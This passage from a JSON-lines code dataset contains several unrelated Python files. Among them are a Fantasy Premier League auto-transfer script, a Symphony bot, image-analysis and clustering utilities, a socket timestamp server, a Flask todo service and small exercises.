functions.defining_cookies(cookiesDict,words[2],words[3],number_of_elements_per_cookie,words)\nprint(cookiesDict)\n","repo_name":"bahramhay/project_testclass_one","sub_path":"myapplication/input_dictionary.py","file_name":"input_dictionary.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72143916409","text":"from picker import calc_weights\nimport requests\nimport json \nimport pandas as pd\nfrom datetime import datetime, timedelta\n\ncolumns = 
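A matching client for the timestamp server above (a sketch; host and port mirror the server's constants, and the reply is the send time prepended to the echoed payload):

from socket import socket, AF_INET, SOCK_STREAM

client = socket(AF_INET, SOCK_STREAM)
client.connect(('localhost', 9876))
client.send('hello'.encode('utf-8'))
print(client.recv(1024).decode('utf-8'))   # e.g. "Mon Jan 01 00:00:00 2024 hello"
client.close()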
['chance_of_playing_next_round', 'chance_of_playing_this_round', 'code',\n 'element_type', 'ep_next',\n 'ep_this', 'first_name', 'form', 'id', 'in_dreamteam',\n 'now_cost', 'points_per_game',\n 'second_name', 'selected_by_percent', \n 'team', 'team_code', 'total_points', 'transfers_in',\n 'transfers_out',\n 'value_form', 'value_season', 'web_name', \n 'influence', 'creativity', 'threat',\n 'ict_index']\n\ndef update_team(email, password, id):\n \n session = requests.session()\n\n players_df, fixtures_df, gameweek=get_data()\n\n data = {'login' : email, 'password' : password, 'app' : 'plfpl-web', 'redirect_uri' : 'https://fantasy.premierleague.com/'}\n login_url = \"https://users.premierleague.com/accounts/login/\"\n \n t=session.post(url=login_url, data=data)\n url = \"https://fantasy.premierleague.com/api/my-team/\" + str(id)\n team = session.get(url)\n team = json.loads(team.content)\n\n bank = team['transfers']['bank']\n\n players = [x['element'] for x in team['picks']]\n\n my_team = players_df.loc[players_df.id.isin(players)]\n potential_players = players_df.loc[~players_df.id.isin(players)]\n\n player_out = calc_out_weight(my_team)\n rows_to_drop=player_out.index.values.astype(int)[0]\n my_team=my_team.drop(rows_to_drop)\n\n position = player_out.element_type.iat[0]\n out_cost = player_out.now_cost.iat[0]\n budget = bank + out_cost\n dups_team = my_team.pivot_table(index=['team'], aggfunc='size')\n invalid_teams = dups_team.loc[dups_team==3].index.tolist()\n\n potential_players=potential_players.loc[~potential_players.team.isin(invalid_teams)]\n potential_players=potential_players.loc[potential_players.element_type==position]\n potential_players = potential_players.loc[potential_players.now_cost<=budget]\n\n player_in = calc_in_weights(potential_players, fixtures_df)\n my_team = my_team.append(player_in)\n my_team = calc_starting_weight(my_team)\n my_team =my_team.sort_values('weight', ascending=False)\n\n goalies = my_team.loc[my_team.element_type==1]\n\n\n outfied_players = my_team.loc[my_team.element_type!=1]\n\n captain = outfied_players.id.iat[0]\n vice_captain = outfied_players.id.iat[1]\n\n starters = goalies.head(1).append(outfied_players[:10])\n subs = goalies.tail(1).append(outfied_players[10:])\n\n headers = {'content-type': 'application/json', 'origin': 'https://fantasy.premierleague.com', 'referer': 'https://fantasy.premierleague.com/transfers'}\n transfers = [{\"element_in\" : int(player_in.id.iat[0]), \"element_out\" : int(player_out.id.iat[0]),\"purchase_price\": int(player_in.now_cost.iat[0]), \"selling_price\" : int(player_out.now_cost.iat[0])}]\n transfer_payload = { \"transfers\" : transfers,\"chip\" : None,\"entry\" : id,\"event\" : int(gameweek)}\n url = 'https://fantasy.premierleague.com/api/transfers/'\n print(\"Transferring Out: \" + player_out.web_name.iat[0] + \", Transferring In: \" + player_in.web_name.iat[0])\n print(\"Starters: \" + str(starters.web_name.tolist()))\n print(\"Subs: \" + str(subs.web_name.tolist()))\n t=session.post(url=url, data=json.dumps(transfer_payload), headers=headers)\n \n picks =[]\n count = 1\n for i in range(1,5):\n players = starters.loc[starters.element_type==i]\n ids = players.id.tolist()\n for ide in ids:\n if ide == captain:\n player = {\"element\" : ide, \"is_captain\" : True, \"is_vice_captain\" : False, \"position\" : count}\n elif ide == vice_captain:\n player = {\"element\" : ide, \"is_captain\" : False, \"is_vice_captain\" : True, \"position\" : count}\n else:\n player = {\"element\" : ide, \"is_captain\" : False, 
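update_team enforces FPL's three-players-per-club cap by counting current picks and blacklisting full clubs before choosing a transfer target; the filter in isolation on toy frames:

import pandas as pd

my_team = pd.DataFrame({"id": range(5), "team": [1, 1, 1, 2, 2]})
dups_team = my_team.pivot_table(index=["team"], aggfunc="size")
invalid_teams = dups_team.loc[dups_team == 3].index.tolist()   # club 1 is at the cap

pool = pd.DataFrame({"id": [10, 11], "team": [1, 2]})
pool = pool.loc[~pool.team.isin(invalid_teams)]                # only club 2 survives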
\"is_vice_captain\" : False, \"position\" : count}\n picks.append(player.copy())\n count+=1\n ids = subs.id.tolist()\n for ide in ids:\n player = {\"element\" : ide, \"is_captain\" : False, \"is_vice_captain\" : False, \"position\" : count}\n picks.append(player.copy())\n count+=1\n team_sheet = {\"picks\" : picks,\"chip\" : None}\n headers = {'content-type': 'application/json', 'origin': 'https://fantasy.premierleague.com', 'referer': 'https://fantasy.premierleague.com/my-team'}\n url = 'https://fantasy.premierleague.com/api/my-team/'+str(id) + '/'\n t=session.post(url=url, json=team_sheet,headers=headers)\n\ndef get_data():\n\n \n players = get('https://fantasy.premierleague.com/api/bootstrap-static/')\n players_df = pd.DataFrame(players['elements'])\n teams_df = pd.DataFrame(players['teams'])\n fixtures_df = pd.DataFrame(players['events'])\n today = datetime.now().timestamp()\n fixtures_df = fixtures_df.loc[fixtures_df.deadline_time_epoch>today]\n # if check_update(fixtures_df) == False:\n # print(\"Deadline Too Far Away\")\n # exit(0)\n gameweek = fixtures_df.iloc[0].id\n players_df = players_df[columns]\n players_df.chance_of_playing_next_round = players_df.chance_of_playing_next_round.fillna(100.0)\n players_df.chance_of_playing_this_round = players_df.chance_of_playing_this_round.fillna(100.0)\n fixtures = get('https://fantasy.premierleague.com/api/fixtures/?event='+str(gameweek))\n fixtures_df = pd.DataFrame(fixtures)\n\n fixtures_df=fixtures_df.drop(columns=['id'])\n teams=dict(zip(teams_df.id, teams_df.name))\n players_df['team_name'] = players_df['team'].map(teams)\n fixtures_df['team_a_name'] = fixtures_df['team_a'].map(teams)\n fixtures_df['team_h_name'] = fixtures_df['team_h'].map(teams)\n\n home_strength=dict(zip(teams_df.id, teams_df.strength_overall_home))\n away_strength=dict(zip(teams_df.id, teams_df.strength_overall_home))\n\n fixtures_df['team_a_strength'] = fixtures_df['team_a'].map(away_strength)\n fixtures_df['team_h_strength'] = fixtures_df['team_h'].map(home_strength)\n\n a_players = pd.merge(players_df, fixtures_df, how=\"inner\", left_on=[\"team\"], right_on=[\"team_a\"])\n h_players = pd.merge(players_df, fixtures_df, how=\"inner\", left_on=[\"team\"], right_on=[\"team_h\"])\n\n a_players['diff'] = a_players['team_a_strength'] - a_players['team_h_strength']\n h_players['diff'] = h_players['team_h_strength'] - h_players['team_a_strength']\n\n players_df = a_players.append(h_players)\n return players_df, fixtures_df, gameweek\ndef get(url):\n response = requests.get(url)\n return json.loads(response.content)\n\ndef check_update(df):\n \n today = datetime.now()\n tomorrow=(today + timedelta(days=1)).timestamp()\n today = datetime.now().timestamp()\n df = df.loc[df.deadline_time_epoch>today]\n \n deadline = df.iloc[0].deadline_time_epoch\n if deadline1]\n ps_not_playing = df.loc[~df.team.isin(teams_playing)]\n ps_playing_twice=df.loc[df.team.isin(teams_playing_twice)]\n for x in df.iterrows():\n \n weight = 0.1\n weight+= x[1]['diff']/5\n if mode == 'b':\n weight+= float(x[1]['points_per_game'])*4\n else:\n weight+= float(x[1]['form'])*4\n weight -= (100-float(x[1]['chance_of_playing_this_round'])) * 0.2\n weight -= (100-float(x[1]['chance_of_playing_next_round'])) * 0.2\n if weight < 0:\n weight = 0\n if x[1]['id'] in ps_not_playing['id']:\n weight+=5\n if x[1]['id'] in ps_playing_twice['id']:\n weight -=5\n \n if weight < 3:\n weight = 0\n x[1]['weight'] = weight\n df1 = df1.append(x[1])\n df1=df1.sort_values('weight', ascending=False).iloc[0:200]\n return 
df1.sample(1, weights=df1.weight)\n\ndef calc_out_weight(players):\n\n df1 = pd.DataFrame(columns=players.columns.tolist())\n\n for x in players.iterrows():\n weight = 20\n weight-= x[1]['diff']/5\n weight -= float(x[1]['form'])*5\n weight += (100-float(x[1]['chance_of_playing_this_round'])) * 0.2\n\n if weight < 0:\n weight = 0\n if x[1]['element_type'] == 1:\n weight == 0\n if weight < 0:\n weight = 0\n x[1]['weight'] = weight\n df1 = df1.append(x[1])\n return df1.sample(1, weights=df1.weight)\n\ndef calc_starting_weight(players):\n df1 = pd.DataFrame(columns=players.columns.tolist())\n\n for x in players.iterrows():\n weight = 0\n weight+= x[1]['diff']/5\n weight += float(x[1]['form'])*5\n weight -= (100-float(x[1]['chance_of_playing_this_round'])) * 0.2\n\n if weight < 0:\n weight = 0\n x[1]['weight'] = weight\n df1 = df1.append(x[1])\n return df1\n\ndef lambda_handler(event, context):\n email = \"fwexnbhqowxfcdejdv@rffff.net\"\n password = \"password123\"\n user_id = \"6993864\"\n update_team(email, password,user_id)\n","repo_name":"ConorAspell/fpl_youtube_part_1","sub_path":"updates.py","file_name":"updates.py","file_ext":"py","file_size_in_byte":9185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4564264849","text":"#!/usr/bin/env python3\nimport asyncio\nimport logging.config\nfrom pathlib import Path\n\nfrom symphony.bdk.core.activity.command import CommandContext\nfrom symphony.bdk.core.config.loader import BdkConfigLoader\nfrom symphony.bdk.core.service.datafeed.real_time_event_listener import RealTimeEventListener\nfrom symphony.bdk.core.symphony_bdk import SymphonyBdk\nfrom symphony.bdk.gen.agent_model.v4_initiator import V4Initiator\nfrom symphony.bdk.gen.agent_model.v4_message_sent import V4MessageSent\n\nfrom .activities import EchoCommandActivity, GreetUserJoinedActivity\nfrom .gif_activities import GifSlashCommand, GifFormReplyActivity\n\n# Configure logging\ncurrent_dir = Path(__file__).parent.parent\nlogging_conf = Path.joinpath(current_dir, 'resources', 'logging.conf')\nlogging.config.fileConfig(logging_conf, disable_existing_loggers=False)\n\n\nasync def run():\n config = BdkConfigLoader.load_from_file(Path.joinpath(current_dir, 'resources', 'config.yaml'))\n\n async with SymphonyBdk(config) as bdk:\n datafeed_loop = bdk.datafeed()\n datafeed_loop.subscribe(MessageListener())\n\n activities = bdk.activities()\n activities.register(EchoCommandActivity(bdk.messages()))\n activities.register(GreetUserJoinedActivity(bdk.messages(), bdk.users()))\n activities.register(GifSlashCommand(bdk.messages()))\n activities.register(GifFormReplyActivity(bdk.messages()))\n\n @activities.slash(\"/hello\")\n async def hello(context: CommandContext):\n name = context.initiator.user.display_name\n response = f\"Hello {name}, hope you are doing well!\"\n await bdk.messages().send_message(context.stream_id, response)\n\n # Start the datafeed read loop\n await datafeed_loop.start()\n\n\nclass MessageListener(RealTimeEventListener):\n async def on_message_sent(self, initiator: V4Initiator, event: V4MessageSent):\n logging.debug(\"Message received from %s: %s\",\n initiator.user.display_name, event.message.message)\n\n\n# Start the main asyncio run\ntry:\n logging.info(\"Running bot application...\")\n asyncio.run(run())\nexcept KeyboardInterrupt:\n logging.info(\"Ending bot 
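All three calc_* pickers end in pandas' weighted sampling, so rows driven to weight 0 can never be drawn; a two-line illustration:

import pandas as pd

df = pd.DataFrame({"web_name": ["A", "B", "C"], "weight": [0.0, 5.0, 1.0]})
pick = df.sample(1, weights=df.weight)   # "A" has zero weight and is never chosen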
application\")\n","repo_name":"finos/generator-symphony","sub_path":"generators/python/templates/bot-app/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"77"} +{"seq_id":"14353567595","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jan 21 16:28:18 2020\r\n@author: Michael\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport scipy.ndimage\r\nimport scipy.optimize\r\nimport scipy.special as scs\r\nimport matplotlib.pyplot as plt\r\nimport tkinter as tk\r\nfrom labclerk import filedlg\r\nimport orchard as orc\r\nimport opfunclib as ofl\r\nimport scipy.interpolate as spi\r\nimport re\r\n\r\n\r\ndef getval (data,position):\r\n search= [1 if i >=position else 0 for i in data[0,:]]\r\n upperbound=search.index(1)\r\n value=(data[1,upperbound]+data[1,upperbound-1])/2\r\n return value\r\n\r\ndef read_pgm(filename, byteorder='>'):\r\n \"\"\"Return image data from a raw PGM file as numpy array.\r\n Format specification: http://netpbm.sourceforge.net/doc/pgm.html\r\n \"\"\"\r\n with open(filename, 'rb') as f:\r\n buffer = f.read()\r\n try:\r\n header, width, height, maxval = re.search(\r\n b\"(^P5\\s(?:\\s*#.*[\\r\\n])*\"\r\n b\"(\\d+)\\s(?:\\s*#.*[\\r\\n])*\"\r\n b\"(\\d+)\\s(?:\\s*#.*[\\r\\n])*\"\r\n b\"(\\d+)\\s(?:\\s*#.*[\\r\\n]\\s)*)\", buffer).groups()\r\n except AttributeError:\r\n raise ValueError(\"Not a raw PGM file: '%s'\" % filename)\r\n return np.frombuffer(buffer,\r\n dtype='u1' if int(maxval) < 256 else byteorder+'u2',\r\n count=int(width)*int(height),\r\n offset=len(header)\r\n ).reshape((int(height), int(width)))\r\n\r\n\r\n\r\ndef diodetrace(position,intensity):\r\n modpos=position-np.mean(position)\r\n def trace(x,A,FWHM):\r\n y=(1/(2*np.sqrt(1/FWHM**2)*np.sqrt(np.log(2))))*A*(0.8862269254527579*scs.erf(2*np.sqrt(1/FWHM**2)*(0.4999999995 - x)*np.sqrt(np.log(2))) + 0.8862269254527579* scs.erf(2*np.sqrt(1/FWHM**2)*(0.5000000005 + x)*np.sqrt(np.log(2))))\r\n return y\r\n imax=np.amax(intensity)\r\n fit,covar=scipy.optimize.curve_fit(trace,modpos,intensity,p0=[imax,1])\r\n return fit\r\ndef uline(image):\r\n \"\"\"\r\n Brings up image and user selects two points to define a line across. Returns coordinates of two points.\r\n \"\"\"\r\n orc.imshow(image)\r\n pts=np.intc(plt.ginput(2,timeout=-1))\r\n plt.close()\r\n return pts\r\n \r\ndef extractlineout(image,x0,x1,y0,y1,num,width): # provides lineout of image with averaging over specified width\r\n if x1==x0:\r\n dx=width/2\r\n dy=0\r\n elif y1==y0:\r\n dx=0\r\n dy=width/2\r\n else:\r\n angle=np.arctan((y1-y0)/(x1-x0))\r\n dx=width/2*np.sin(angle)\r\n dy=width/2*np.cos(angle)\r\n x0s=np.linspace(x0-dx,x0+dx,width)\r\n x1s=np.linspace(x1-dx,x1+dx,width)\r\n y0s=np.linspace(y0-dy,y0+dy,width)\r\n y1s=np.linspace(y1-dy,y1+dy,width)\r\n length=np.sqrt((x1-x0)**2+(y1-y0)**2)\r\n dist=np.linspace(0,length,num)\r\n line=np.zeros(num)\r\n for i in range(width):\r\n x, y = np.linspace(x0s[i], x1s[i], num), np.linspace(y0s[i], y1s[i], num) \r\n line = line+scipy.ndimage.map_coordinates(image, np.vstack((y,x)))/width # Extract the values along the line, using cubic interpolation. 
x & y flipped because of image format\r\n #data=np.vstack((dist,line))\r\n plt.close()\r\n return line,dist\r\n\r\ndef lineout(image,num,width):\r\n pt0,pt1=uline(image)\r\n x0,y0=pt0\r\n x1,y1=pt1\r\n line,dist=extractlineout(image,x0,x1,y0,y1,num,width)\r\n return line,dist,pt0,pt1\r\n \r\ndef integim(image):\r\n maxind=np.argmax(image[1:,1:]) # gives the flattened index of maximum ignoring the first row and column due to camera aberrations\r\n cols=np.size(image,axis=1) # find number of columns\r\n rows=np.size(image,axis=0)\r\n maxrow=maxind//(cols-1)+1\r\n maxcol=maxind%(cols-1)+1\r\n maxind=(maxrow,maxcol)\r\n \r\n rmax=np.min([maxrow,maxcol,rows-maxrow,cols-maxcol])\r\n radii=range(rmax)\r\n sums=[]\r\n modderiv=[]\r\n for r in radii:\r\n newsum=np.sum(image[maxrow-r:maxrow+r+1,maxcol-r:maxcol+r+1])\r\n sums.append(newsum)\r\n \r\n if r==0:\r\n modderiv.append(newsum)\r\n else:\r\n modderiv.append((sums[r]-sums[r-1])/(4*r))\r\n \r\n return maxind,np.array(sums),np.array(modderiv) \r\n\r\ndef fluencefactor(image,threshold=5):\r\n \"\"\"\r\n Calculates the fluence factor for focal spot images.\r\n \"\"\"\r\n maxind,sums,deriv=integim(image)\r\n crop_radius=np.min(np.where(deriv<0.1))\r\n crop=image.copy()[maxind[0]-crop_radius:maxind[0]+crop_radius,maxind[1]-crop_radius:maxind[1]+crop_radius]\r\n \r\n orc.graph()\r\n plt.imshow(crop)\r\n \r\n crop[crop\nimport os, sys\nimport argparse\n\n##__________________________________________________________________||\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--input-files\", default = [ ], nargs = '*', help = \"list of input files\")\nparser.add_argument(\"--dataset-names\", default = [ ], nargs = '*', help = \"list of data set names\")\nparser.add_argument(\"-p\", \"--process\", default = 1, type = int, help = \"number of processes to run in parallel\")\nparser.add_argument('-o', '--outdir', default = os.path.join('tbl', 'out'))\nparser.add_argument('-q', '--quiet', action = 'store_true', default = False, help = 'quiet mode')\nparser.add_argument('-n', '--nevents', default = -1, type = int, help = 'maximum number of events to process for each component')\nparser.add_argument('--max-events-per-process', default = -1, type = int, help = 'maximum number of events per process')\nparser.add_argument('--force', action = 'store_true', default = False, help = 'recreate all output files')\nargs = parser.parse_args()\n\n##__________________________________________________________________||\nimport AlphaTwirl\nimport Framework\nimport Scribbler\n\n##__________________________________________________________________||\ndef main():\n\n reader_collector_pairs = [ ]\n\n #\n # configure scribblers\n #\n NullCollector = AlphaTwirl.Loop.NullCollector\n reader_collector_pairs.extend([\n ])\n\n #\n # configure tables\n #\n Binning = AlphaTwirl.Binning.Binning\n Round = AlphaTwirl.Binning.Round\n RoundLog = AlphaTwirl.Binning.RoundLog\n htbin = Binning(boundaries = (0, 200, 400, 800))\n njetbin = Binning(boundaries = (1, 2, 3, 4, 5))\n tblcfg = [\n dict(keyAttrNames = ('mht40_pt', ), binnings = (Round(10, 0), ), keyOutColumnNames = ('mht', )),\n dict(keyAttrNames = ('ht40', 'mht40_pt'), binnings = (htbin, Round(10, 0)), keyOutColumnNames = ('ht', 'mht')),\n dict(keyAttrNames = ('ht40', 'nJet40', 'mht40_pt'), binnings = (htbin, njetbin, Round(10, 0)), keyOutColumnNames = ('ht', 'njet', 'mht')),\n dict(keyAttrNames = ('ht40', 'jet_pt'), binnings = (htbin, RoundLog(0.1, 100)), keyIndices = (None, 0), keyOutColumnNames = ('ht', 'jet_pt')),\n 
dict(keyAttrNames = ('ht40', 'jet_pt'), binnings = (htbin, RoundLog(0.1, 100)), keyIndices = (None, '*'), keyOutColumnNames = ('ht', 'jet_pt')),\n ]\n\n # complete table configs\n tableConfigCompleter = AlphaTwirl.Configure.TableConfigCompleter(\n defaultSummaryClass = AlphaTwirl.Summary.Count,\n defaultOutDir = args.outdir,\n createOutFileName = AlphaTwirl.Configure.TableFileNameComposer2()\n )\n tblcfg = [tableConfigCompleter.complete(c) for c in tblcfg]\n\n # do not recreate tables that already exist unless the force option is used\n if not args.force:\n tblcfg = [c for c in tblcfg if c['outFile'] and not os.path.exists(c['outFilePath'])]\n\n reader_collector_pairs.extend(\n [AlphaTwirl.Configure.build_counter_collector_pair(c) for c in tblcfg]\n )\n\n #\n # configure data sets\n #\n dataset_names = args.dataset_names if args.dataset_names else args.input_files\n datasets = [Framework.Dataset(n, f) for n, f in zip(dataset_names, args.input_files)]\n\n #\n # run\n #\n fw = Framework.Framework(\n quiet = args.quiet,\n process = args.process,\n max_events_per_dataset = args.nevents,\n max_events_per_process = args.max_events_per_process\n )\n fw.run(\n datasets = datasets,\n reader_collector_pairs = reader_collector_pairs\n )\n\n##__________________________________________________________________||\nif __name__ == '__main__':\n main()\n","repo_name":"TaiSakuma/twirl-example","sub_path":"twirl.py","file_name":"twirl.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38349190843","text":"from flask import request\nimport json\nfrom config import mongo_client\nfrom bson.objectid import ObjectId\nfrom bson.json_util import dumps\n\nclass Todo:\n coll_name = 'todo'\n\n def __init__(self):\n pass\n\n def get(self):\n user_id = request.headers.get('userid')\n response = []\n for data in mongo_client[self.coll_name].find({'user_id': user_id}):\n data['_id'] = str(data['_id'])\n response.append(data)\n return response\n\n def create(self):\n user_id = request.headers.get('userid')\n data = request.get_json(force=True)\n data['user_id'] = user_id\n data['_id'] = str(mongo_client[self.coll_name].insert(data))\n return data\n \n def update(self, todo_id):\n user_id = request.headers.get('userid')\n data = request.get_json(force=True)\n data['user_id'] = user_id\n mongo_client[self.coll_name].update_one({'_id': ObjectId(todo_id), 'user_id': user_id}, {'$set': data})\n return data\n \n def delete(self, todo_id):\n user_id = request.headers.get('userid')\n mongo_client[self.coll_name].delete_one({'user_id': user_id, '_id': ObjectId(todo_id)})\n return True","repo_name":"Mohammed-Aadil/bits-todo","sub_path":"service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21700783532","text":"\n\nimport numpy as np\nfrom sklearn import mixture\n# %matplotlib inline\nimport matplotlib.pyplot as plt\n\nwith open(\"clusters.txt\") as f:\n d = f.readlines()\nn = len(d) # num of total data\ndim = 2 # dimension of data\ndata = np.zeros((n,dim), dtype='float64') # data\nfor i in range(n):\n data_ = d[i].split(',')\n data[i][0] = float(data_[0])\n data[i][1] = float(data_[1])\n# print(data)\nm=mixture.GaussianMixture(n_components=3)\nm.fit(data)\nlabels = m.predict(data)\nplt.scatter(data[:, 0], data[:, 1], c=labels, s=40, cmap='viridis')\nplt.show()\ncovariances = 
m.covariances_\nmeans=m.means_\nprint(\"Means:\\n\",means)\nprint(\"Covariances:\\n\",covariances)\nprint(\"Amplitude:\")\nfor i in covariances:\n print(1.0 / np.linalg.det(i))\n","repo_name":"YOYOXUE/MachineLearningINF","sub_path":"GMM/GMM_lib.py","file_name":"GMM_lib.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27102663878","text":"import random\nimport numpy as np\n\n\ndef slotGenarator(num):\n whe = random.randint(3, 5)\n print(whe)\n lst = []\n for a in range(num):\n spin = \"\"\n for b in range(whe):\n num = random.randint(1, 9)\n spin += str(num) + \" \"\n print(spin)\n lst.append(spin.strip())\n findSlotNumber(lst)\n\n\ndef findSlotNumber(ary):\n lst = []\n agn = []\n for a in ary:\n tlt = a.split(\" \")\n ntl = []\n for b in tlt:\n ntl.append(int(b))\n ntl = sorted(ntl)\n lst.append(ntl)\n agn = np.array(lst).T.tolist()\n ttl = 0\n for b in agn:\n ttl += max(b)\n # print(lst)\n print(ttl)\n\n\nslotGenarator(50)\n","repo_name":"bipulcn/python_problem","sub_path":"quiz_12_slot.py","file_name":"quiz_12_slot.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73558265530","text":"import cv2\nimport numpy as np\n\n# Load the image\nimage = cv2.imread(\"/Users/magnusgogstad/Desktop/ImageCroppingInputs/image.jpg\")\n\n# Convert the image to grayscale\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n# Apply thresholding to create a binary image\n_, thresh = cv2.threshold(gray, 200, 255, cv2.THRESH_BINARY)\n\n# Find contours in the binary image\ncontours, _ = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n# Initialize variables to track the largest white rectangle\nlargest_area = 0\nlargest_contour = None\n\n# Process each contour\nfor contour in contours:\n # Calculate the area of the contour\n area = cv2.contourArea(contour)\n\n # Check if the area is larger than the current largest\n if area > largest_area:\n largest_area = area\n largest_contour = contour\n\n# Get the coordinates of the bounding box around the largest white contour\nx, y, w, h = cv2.boundingRect(largest_contour)\n\n# Crop the region containing the largest white contour\nlargest_white_contour = image[y:y+h, x:x+w]\n\n# Save the resized image as a single image\ncv2.imwrite(\"/Users/magnusgogstad/Desktop/ImageCroppingOutputs/image_new.jpg\", largest_white_contour)\n\nkernel = np.array([[0, -1, 0],\n [-1, 5,-1],\n [0, -1, 0]])\nimage_sharp = cv2.filter2D(src=image, ddepth=-1, kernel=kernel)\n\nimg = cv2.imread('/Users/magnusgogstad/Desktop/ImageCroppingOutputs/image_new.jpg', 1)\n# converting to LAB color space\nlab= cv2.cvtColor(img, cv2.COLOR_BGR2LAB)\nl_channel, a, b = cv2.split(lab)\n\n# Applying CLAHE to L-channel\n# feel free to try different values for the limit and grid size:\nclahe = cv2.createCLAHE(clipLimit=3.0, tileGridSize=(12,12))\ncl = clahe.apply(l_channel)\n\n# merge the CLAHE enhanced L-channel with the a and b channel\nlimg = cv2.merge((cl,a,b))\n\n# Converting image from LAB Color model to BGR color space\nenhanced_img = cv2.cvtColor(limg, cv2.COLOR_LAB2BGR)\n\n# Stacking the original image with the enhanced image\nresult = np.hstack((img, enhanced_img))\ncv2.imwrite('/Users/magnusgogstad/Desktop/ImageCroppingOutputs/output_Image1.jpg',result)\ncv2.imshow('Result', 
result)\ncv2.waitKey()\ncv2.destroyAllWindows()\n\n\n#cv2.imshow('/Users/magnusgogstad/Desktop/outpiin.jpg', image_sharp)\n#cv2.waitKey()\n#cv2.destroyAllWindows()\n","repo_name":"jadamixd/CodeNTNU-Hackathon","sub_path":"camera/Kontrast_Sharpen.py","file_name":"Kontrast_Sharpen.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31289404208","text":"import unittest\nfrom main import part_1, part_2\n\n\nclass MainTest(unittest.TestCase):\n def test_solution_part_1(self):\n with open('./input', 'r') as data:\n r = part_1(data)\n self.assertEqual(r, 2662308295)\n\n def test_solution_part_2(self):\n with open('./input', 'r') as data:\n r = part_2(data)\n self.assertEqual(r, 63441)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Thewessen/hello-world","sub_path":"Adventofcode/2019/day09/main_test.py","file_name":"main_test.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31006139089","text":"import os\nimport glob\nimport cv2\nfrom collections import Counter\nfrom sklearn.datasets import make_classification\nfrom imblearn.over_sampling import ADASYN\n\ndef read_data(datapath):\n datadict, labldict = {}, {}\n domnlist = [x for x in os.listdir(datapath)\n if os.path.isdir(os.path.join(datapath, x))]\n for domnitem in domnlist:\n labldict[domnitem] = {}\n datadict[domnitem] = {'X': [], 'Y': []}\n labllist = [x for x in os.listdir(os.path.join(datapath, domnitem))\n if os.path.isdir(os.path.join(datapath, domnitem, x))]\n for lablcode, lablitem in enumerate(labllist):\n labldict[domnitem][lablcode] = lablitem\n lablpath = os.path.join(datapath, domnitem, lablitem)\n filelist = glob.iglob(os.path.join(lablpath, '*.jpg'))\n print('Loading data with label {} in domain {}'.format(lablitem, domnitem))\n for fileitem in filelist:\n imagdata = cv2.imread(fileitem)\n imagdata = cv2.resize(imagdata, (256, 256))\n imagdata = imagdata.reshape(256 * 256 * 3)\n #imagdata = imagdata.transpose((2, 0, 1))\n datadict[domnitem]['X'].append(imagdata)\n datadict[domnitem]['Y'].append(lablcode)\n return datadict, labldict\n\ndef resampling(datadict, labldict, savepath):\n ratiodic = {}\n for domnitem in datadict:\n ratiodic[domnitem] = {}\n for lablcode in range(0, 31):\n ratiodic['amazon'][lablcode] = 145\n ratiodic['dslr'][lablcode] = 100\n ratiodic['webcam'][lablcode] = 100\n \n for domnitem in datadict:\n lablcout, lablnumb = {}, {}\n sorcdata = datadict[domnitem]['X']\n sorclabl = datadict[domnitem]['Y']\n print('Resampling data in domain {}'.format(domnitem))\n adasyn = ADASYN(ratio = ratiodic[domnitem], random_state = 42)\n targdata, targlabl = adasyn.fit_sample(sorcdata, sorclabl)\n print('Saving data in domain {}'.format(domnitem))\n for imagcode, targimag in enumerate(targdata):\n lablcode = targlabl[imagcode]\n if lablcode not in lablcout:\n lablcout[lablcode] = 0\n lablnumb[lablcode] = 0\n else:\n lablcout[lablcode] += 1\n for imagcode, targimag in enumerate(targdata):\n lablcode = targlabl[imagcode]\n lablname = labldict[domnitem][lablcode]\n lablnumb[lablcode] += 1\n strsleng = len(str(lablcout[lablcode]))\n numbstrs = str(lablnumb[lablcode]).zfill(strsleng)\n targpath = os.path.join(savepath, domnitem, lablname)\n if not os.path.exists(targpath): os.makedirs(targpath)\n imagpath = os.path.join(targpath, 'img_' + numbstrs)\n targimag = targimag.reshape(256, 256, 3)\n 
cv2.imwrite(imagpath + '.jpg', targimag)\n\nif __name__=='__main__':\n datapath = './domain_adaptation_images'\n savepath = './domain_adaptation_images_resampled'\n datadict, labldict = read_data(datapath)\n resampling(datadict, labldict, savepath)","repo_name":"JiahaoLi-gdut/CAFFE-DACH","sub_path":"examples/_imag_homo/_datasets/adasyn_over_sampling.py","file_name":"adasyn_over_sampling.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20489551855","text":"from signbank.dictionary.models import GlossFrequency\nfrom json import dumps\n\ndef regionality_score(percentages, skip_zeroes = True):\n\n if skip_zeroes:\n percentages = list(filter(lambda a: a != 0, percentages)) \n\n expected_score = 1/len(percentages)\n maximum_total_deviation = (len(percentages)-1) * expected_score + abs(1 - expected_score)\n total_deviation_from_expected = sum([abs(perc-expected_score) for perc in percentages])\n\n try:\n return 